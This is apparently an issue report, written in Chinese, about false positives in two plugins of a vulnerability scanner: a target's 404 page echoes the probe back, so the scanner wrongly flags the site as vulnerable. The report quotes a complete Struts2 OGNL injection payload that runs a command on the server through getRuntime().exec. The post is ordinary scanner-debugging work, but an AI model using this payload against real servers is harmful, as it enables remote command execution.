009 和 012 两个插件扫描可能存在问题

[Fxyer]

看工具判断逻辑是让服务器 echo 一个 哈希字符，看返回值是否有这个字符串来判断是否存在。 实际情况发现，目标可能出现 404 报错，把 poc 吐回来： message XXXXXXXXX.TEST&key=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec(%27echo%205ee2994195febadcf54bb3c3f88f02b3%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%[email protected]@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(key)(%27meh%27)] poc 被返回了： getRuntime().exec(%27echo%205ee2994195febadcf54bb3c3f88f02b3%27) 然后判断存在漏洞... 给加上一次判断吧